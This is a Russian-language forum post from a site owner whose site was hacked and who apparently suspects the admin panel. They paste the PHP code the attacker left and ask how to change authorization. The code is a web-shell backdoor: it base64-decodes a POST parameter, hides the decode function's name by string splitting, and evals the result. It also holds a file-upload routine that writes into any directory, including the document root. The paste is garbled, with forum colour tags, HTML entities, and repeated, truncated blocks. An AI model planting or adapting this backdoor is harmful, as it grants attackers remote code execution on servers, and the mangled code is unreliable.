D
Deleted User
Гость
собственно взломали и оставили код.как можна защитить? думаю ломали через админку... можна как нибудь изменить способ авторизации?пример кода...<!--FILE IS NULL OR EMPTY--><?php$version = "1.5";if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["[color=#FF0000]gjwqweodsa[/color]"])){$isevalfunctionavailable = false;$evalcheck = "\\$isevalfunctionavailable = true;";@eval($evalcheck);if ($isevalfunctionavailable === true) { $fnsdht = "b".""."as"."e"."".""."6";."4"."_"."de".""."c"."o"."&#34;."d"."e"; $fv = $fnsdht($_POST["[color=#FF0000]gjwqweodsa[/color]"]); @eval($fv); //@eval($_POST["gjwqweodsa"]);}else{ $mpath = realpath("")."/"; //$dop = "\\n@unlink(\\"".$mpath."dsadasdsa1fag1.php\\");;\\n"; if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\\n".$fnsdht($_POST 1;"[color=#FF0000]gjwqweodsa[/color]"])."\
?>")){ &nbsp; @include_once($mpath."dsadasdsa1fag1.php"); &nbsp; @unlink($mpath."dsadasdsa1fag1.php"); }else{ &nbsp; echo "ERROR! CANT DO NOTHING!"; }}$version = "1.5";if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){ $isevalfunctionavailable = false; $evalcheck = "\\$isevalfunctionavailable = true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { $fnsdht = "b".""."as"."e"."".""."6";."4"."_"."de".""."c"."o"."&#34;."d"."e"; $fv = $fnsdht($_POST["gjwqweodsa"]); @eval($fv); //@eval($_POST["gjwqweodsa"]); }else{ $mpath = realpath("")."/"; //$dop = "\\n@unlink(\\"".$mpath."dsadasdsa1fag1.php\\");;\\n"; if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\\n".$fnsdht($_POST["gjwqweodsa"&#93;)."\\n?>")){ @include_once($mpath."dsadasdsa1fag1.php"); @unlink($mpath."dsadasdsa1fag1.php"); }else{ echo "ERROR! CANT DO NOTHING!"; } }}//if (is_uploaded_file($_FILES['file']['tmp_name']))if(!empty($_POST['fname']) and isset($_POST['fname']) and strlen($_POST['fname'])>0){ $fname = trim($_POST['fname']); $save_type = trim($_POST['save_type']); $dirname = trim($_POST['dirname']); $namecrt = trim($_POST['namecrt']); $auth_pass = trim($_POST['auth_pass']); $change_pass = trim($_POST['change_pass']); $file_type = trim($_POST['file_type']); $ftdata = trim($_POST['ftdata']); $is_sh = trim($_POST['is_sh']); if($namecrt == "random"){ $fname = make_name($fname); } $uploadfile = ""; if($save_type == "same_dir"){ $uploadfile = realpath("")."/". $fname; }else if($save_type == "sub_dir"){ $uploadfile = realpath("")."/$dirname/". $fname; if(!@mkdir(realpath("")."/$dirname/", 0755)){ $uploadfile = realpath("")."/". $fname; } }else if($save_type == "root"){ $root = $_SERVER['DOCUMENT_ROOT']."/"; if(@is_writable($root)){ $uploadfile = $root.$fname; }else{ $uploadfile = realpath("")."/". $fname; } }else if($save_type == "root_in_dir"){
?>")){ &nbsp; @include_once($mpath."dsadasdsa1fag1.php"); &nbsp; @unlink($mpath."dsadasdsa1fag1.php"); }else{ &nbsp; echo "ERROR! CANT DO NOTHING!"; }}$version = "1.5";if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){ $isevalfunctionavailable = false; $evalcheck = "\\$isevalfunctionavailable = true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { $fnsdht = "b".""."as"."e"."".""."6";."4"."_"."de".""."c"."o"."&#34;."d"."e"; $fv = $fnsdht($_POST["gjwqweodsa"]); @eval($fv); //@eval($_POST["gjwqweodsa"]); }else{ $mpath = realpath("")."/"; //$dop = "\\n@unlink(\\"".$mpath."dsadasdsa1fag1.php\\");;\\n"; if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\\n".$fnsdht($_POST["gjwqweodsa"&#93;)."\\n?>")){ @include_once($mpath."dsadasdsa1fag1.php"); @unlink($mpath."dsadasdsa1fag1.php"); }else{ echo "ERROR! CANT DO NOTHING!"; } }}//if (is_uploaded_file($_FILES['file']['tmp_name']))if(!empty($_POST['fname']) and isset($_POST['fname']) and strlen($_POST['fname'])>0){ $fname = trim($_POST['fname']); $save_type = trim($_POST['save_type']); $dirname = trim($_POST['dirname']); $namecrt = trim($_POST['namecrt']); $auth_pass = trim($_POST['auth_pass']); $change_pass = trim($_POST['change_pass']); $file_type = trim($_POST['file_type']); $ftdata = trim($_POST['ftdata']); $is_sh = trim($_POST['is_sh']); if($namecrt == "random"){ $fname = make_name($fname); } $uploadfile = ""; if($save_type == "same_dir"){ $uploadfile = realpath("")."/". $fname; }else if($save_type == "sub_dir"){ $uploadfile = realpath("")."/$dirname/". $fname; if(!@mkdir(realpath("")."/$dirname/", 0755)){ $uploadfile = realpath("")."/". $fname; } }else if($save_type == "root"){ $root = $_SERVER['DOCUMENT_ROOT']."/"; if(@is_writable($root)){ $uploadfile = $root.$fname; }else{ $uploadfile = realpath("")."/". $fname; } }else if($save_type == "root_in_dir"){